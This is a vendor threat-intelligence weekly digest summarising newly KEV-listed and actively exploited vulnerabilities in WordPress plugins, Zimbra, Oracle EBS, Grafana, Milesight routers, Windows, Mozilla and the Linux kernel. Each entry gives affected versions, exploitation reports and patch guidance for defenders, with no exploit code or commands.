The cybersecurity landscape this week continues to demonstrate high activity across both legacy and newly disclosed vulnerabilities, emphasizing the importance of proactive patching and threat monitoring.

This week, 9 vulnerabilities were added to the CISA Known Exploited Vulnerabilities catalog. These include 4 legacy Microsoft flaws, 1 each from Mozilla, Oracle, Synacor Zimbra, Grafana Labs and Linux Kernel.  

Exploitation activity was observed in popular WordPress plugins and Milesight industrial routers. This highlights ongoing targeting of web platforms and IoT infrastructure by threat actors.

Botnet operations continue to surge, with EnemyBot, Sysrv-k, Andoryu, and Androxgh0st exploiting weaknesses in GitLab, cloud gateways, and PHP-based applications. Meanwhile, IoT-focused botnets such as Mirai, Bashlite, Tsunami, and BrickerBot intensified attacks on EirD1000 routers, aiming for persistence and lateral network movement.

Researchers have noted advanced malicious activity exploiting Fortra GoAnywhere MFT’s License Servlet by the cybercrime group Storm-1175, associated with Medusa ransomware deployment. CrowdStrike further identifies zero-day exploitation of Oracle EBS, reflecting targeted enterprise attacks.

Key points

• 9 new vulnerabilities were added to the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting recent exploitation activity.  
• 3 additional vulnerabilities were confirmed as actively exploited in the wild during the week.  
• Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.  
• 2 vulnerabilities were identified as being exploited by active malware campaigns, indicating weaponization by threat actors.  
• Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.

Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.  

CVE-2025-5947
An Authentication Bypass Vulnerability in the Service Finder Bookings plugin for WordPress (affecting versions up to and including 6.0) allows unauthenticated attackers to log in as any user, including administrators, and gain full control of affected websites. The flaw resides in the service_finder_switch_back() function, which was intended to allow users to revert to previous accounts but lacks proper authentication and authorization checks. Wordfence confirmed active exploitation, with attacks observed immediately after disclosure and more than 13,800 exploit attempts blocked by its firewall between August and October 2025. Detection is difficult because indicators are minimal beyond requests containing the switch_back parameter. Remediation for this vulnerability requires updating immediately to Service Finder Bookings version 6.1, which was patched on July 17, 2025. Administrators should also review access logs carefully for any requests containing the switch_back parameter and monitor for suspicious administrative activity to ensure that no unauthorized access has occurred.

CVE-2025-6388
An Authentication Bypass Vulnerability in the Spirit Framework plugin for WordPress (versions up to and including 1.2.14) allows attackers to gain unauthorized access, take over accounts, and escalate privileges. The flaw resides in the custom_actions() function, which fails to properly validate user identity, enabling unauthenticated attackers to log in as any user, including administrators, through crafted requests that bypass credential checks. The Spirit Framework, developed by Theme Spirit and integrated into the widely used Talemy theme for educational and e-learning platforms, increases the exposure of this flaw across thousands of WordPress installations. Wordfence confirmed active exploitation, with 20 blocked attacks recorded within 24 hours. The vulnerability has been patched in version 1.2.15, which introduces enhanced validation mechanisms and stricter authentication controls to mitigate unauthorized access.

CVE-2025-27915
A Cross-Site Scripting (XSS) Vulnerability was identified in Zimbra Collaboration Suite, impacting versions 9.0, 10.0, and 10.1, which could allow attackers to execute arbitrary code on affected systems. This flaw arises from improper input sanitization in web components, enabling injection of malicious scripts that can compromise user sessions or execute unauthorized actions. Synacor Zimbra addressed the issue in versions 9.0.0 Patch 44, 10.0.13, and 10.1.5, released on January 27, 2025. A proof-of-concept (PoC) was recently released, increasing exploitation risk, and the issue has subsequently been added to the CISA Known Exploited Vulnerabilities (KEV) catalog.

CVE-2025-61882
An Unspecified Vulnerability in Oracle E-Business Suite (EBS) affects versions 12.2.3 through 12.2.14, was exploited as a zero-day and allows an unauthenticated remote attacker with HTTP access to compromise the Concurrent Processing component integrated with BI Publisher. Successful exploitation results in arbitrary code execution under the EBS application context and can lead to full host compromise when combined with a local privilege escalation. Oracle released an emergency security patch to address the flaw, after which multiple proof-of-concept (PoC) exploits were published by CrowdStrike, WatchTowr Labs, Resecurity, and Rapid7. The vulnerability has since been added to the CISA KEV catalog, underscoring the importance of immediate patch deployment and security hardening for affected systems.

CVE-2021-22555
An Out-of-Bounds Write vulnerability in the Linux kernel’s netfilter implementation (net/netfilter/x_tables.c) allows a local, unprivileged user, or a container escape from user namespaces to trigger heap corruption and escalate privileges to root or cause a denial-of-service. Linux vendors released kernel updates in 2021 to remediate the issue, and Ubuntu published security advisories documenting the flaw and available fixes. Public proof-of-concepts and a detailed Google security research writeup demonstrate practical exploitation and multiple variants (including pipe-primitive and 32-bit→64-bit techniques), with researchers validating exploitability in realistic test scenarios. The vulnerability has been added to the CISA KEV catalog, reinforcing the need to apply vendor kernel updates immediately.

CVE-2021-43226
A Privilege Escalation Vulnerability in Microsoft Windows exists in the Common Log File System (CLFS) driver, a core component that manages system and application log files; when exploited by an attacker with basic local access, the flaw permits bypass of security controls and elevation of privileges, potentially enabling full system compromise when combined with persistence or high-privilege code execution. Microsoft released a security update in 2021 to remediate the issue. A proof-of-concept (PoC) is available, and the vulnerability has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring the need to apply the vendor update and audit affected hosts.

CVE-2023-43261
An Information Disclosure Vulnerability in Milesight industrial cellular routers affecting models UR5X, UR32L, UR32, UR35, and UR41 allows attackers to access sensitive router components via exposed APIs. Although Milesight patched this vulnerability in October 2023 with firmware version 35.3.0.7 and corresponding updates for affected UR-series models; recent observations from SEKOIA indicate that threat actors have actively exploited this flaw to abuse the router’s API for sending malicious SMS messages containing phishing URLs. These smishing campaigns, ongoing since at least February 2022, primarily target Sweden, Italy, and Belgium, using typosquatted domains impersonating government and financial services such as CSAM and eBox. Out of approximately 18,000 internet-accessible routers, 572 remain potentially vulnerable, highlighting how exposed APIs combined with phishing tactics have facilitated targeted attacks across Europe.

CVE-2021-43798
A Path Traversal Vulnerability in Grafana, affecting versions 8.0.0-beta1 through 8.3.0, allows attackers to navigate outside the Grafana installation directory and remotely access restricted system files such as /etc/passwd/. Grafana Labs patched the flaw in December 2021, releasing updated versions 8.3.1, 8.2.7, 8.1.8, and 8.0.7. The vulnerability originated in the /public/plugins/<plugin-id> URL path, where improper input sanitization permitted unauthorized file reads on vulnerable systems. Recent observations from GreyNoise researchers reveal a renewed surge of exploitation attempts targeting this legacy flaw, involving 110 unique malicious IPs within a single day. The campaign predominantly targeted the United States, Slovakia, and Taiwan, while Bangladesh served as the primary source of scanning activity. The coordinated use of shared TLS JA3 hashes and User-Agent strings indicates the use of common exploit toolkits, underscoring the continued weaponization of older but critical vulnerabilities in modern attack campaigns, and has been recently added to the CISA KEV catalog.

CVE-2013-3918
‍An Out-of-Bounds Write Vulnerability in Microsoft Windows allows remote attackers to execute arbitrary code through a specially crafted web page exploiting the InformationCardSigninHelper ActiveX control (icardie.dll). The flaw exists due to an out-of-bounds write/integer underflow in the legacy ActiveX component, leading to heap corruption and remote code execution within Internet Explorer. Microsoft addressed this issue in November 2013 through security update MS13-090; however, with Internet Explorer reaching end of life in June 2022, any continued use remains highly insecure. Historically, it has been weaponized in major campaigns such as Aurora, LadyBoyle, Tobfy ransomware, Sunshop, Deputy Dog, and Operation Ephemeral Hydra. Although patched, this legacy flaw has now been added to the CISA KEV catalog, underscoring its continued relevance in post-exploitation and historical threat contexts.

CVE-2011-3402
A Remote Code Execution (RCE) Vulnerability in Microsoft Windows affects the win32k.sys TrueType font parsing engine and allows remote attackers to execute arbitrary code via specially crafted fonts embedded in Word documents or web pages. Exploitation corrupts kernel memory, enabling full system compromise, including backdoor installation, privilege escalation, and persistence. The flaw was actively weaponized in the wild by the Duqu malware family in November 2011, often delivered through drive-by web pages or malicious document attachments. Microsoft released a security bulletin in 2011 to patch the vulnerability, which has now been added to the CISA KEV catalog.

CVE-2010-3765
A Remote Code Execution Vulnerability was identified in multiple Mozilla products, including Firefox, SeaMonkey and Thunderbird, which could trigger memory corruption and allow arbitrary code execution. The flaw occurred when document.write() calls were combined with DOM insertion, affecting functions such as nsCSSFrameConstructor::ContentAppended and appendChild, leading to heap corruption. This vulnerability was actively exploited in the wild in October 2010 by malware families like Belmoo, where malicious JavaScript delivered via crafted web pages downloaded and executed additional payloads on victim systems. Proof-of-concept exploits were published shortly after disclosure, demonstrating the heap corruption and the ability to launch backdoors. Although Mozilla released fixes in 2010 (Firefox 3.6.12, Firefox 3.5.15, Thunderbird 3.1.6, Thunderbird 3.0.10, SeaMonkey 2.0.10) to remediate the issue, the vulnerability has now been added to the CISA Known Exploited Vulnerabilities (KEV) catalog.

CVE-2010-3962
An Uninitialized Memory Corruption vulnerability in Microsoft Internet Explorer (IE 6, 7, and 8) allowed remote attackers to achieve arbitrary code execution via specially crafted web pages and HTML/JavaScript that triggered a use‑after‑free in IE’s CSS/DOM handling. Microsoft released patches in December 2010 to remediate the flaw, but support for Internet Explorer ended on June 15, 2022, leaving any remaining IE users exposed to unpatched risks. The vulnerability was actively exploited in the wild during November 2010 through drive‑by campaigns and exploit kits, public proof‑of‑concept code appeared shortly after disclosure, and multiple AV/IDS signatures (including Microsoft Defender detections) flagged exploit attempts. The issue has recently been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring continued relevance for legacy systems.

Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.

Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.

Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analyzed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites. 

CVE-2025-10035
According to Microsoft, the critical deserialization vulnerability CVE-2025-10035 in Fortra GoAnywhere MFT’s License Servlet has been actively exploited by the cybercrime group Storm-1175, known for deploying Medusa ransomware and targeting public-facing applications for initial access. The flaw allows a threat actor with a validly forged license response signature to deserialize an arbitrary actor-controlled object, potentially resulting in command injection and remote code execution. Exploitation activity by Storm-1175 has persisted for nearly a month, prompting Microsoft to urge immediate upgrading to the latest Fortra-recommended versions. This active threat highlights the ongoing targeting of enterprise managed file transfer solutions by ransomware actors.

CVE-2025-61882
According to CrowdStrike, GRACEFUL SPIDER is likely responsible for the mass exploitation campaign against Oracle EBS, with first known exploitation on August 9, 2025.CrowdStrike assesses with high confidence that one or more actors leveraged the flaw as a zero-day and with moderate confidence that GRACEFUL SPIDER sent Cl0p-branded extortion emails on September 29, 2025. Mandiant (Google Cloud) correlates in‑the‑wild exploitation to Cl0p around August 2025, aligning with CrowdStrike’s timeline. A subsequent public exploit bundle facilitated wider abuse by Scattered LAPSUS$ / ShinyHunters and other collectives.

PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.

The surge in exploit activity across legacy and modern systems highlights how both outdated and newly disclosed vulnerabilities continue to fuel threat actor operations. The active exploitation of web platforms, IoT infrastructure, and enterprise applications demonstrates the evolving sophistication of attack chains. Continuous monitoring, rapid patching, and real-time intelligence remain critical to reducing exposure. Platforms like Loginsoft Vulnerability Intelligence (LOVI) empower organizations to stay ahead of these threats by providing actionable insights into exploited vulnerabilities and emerging attack trends.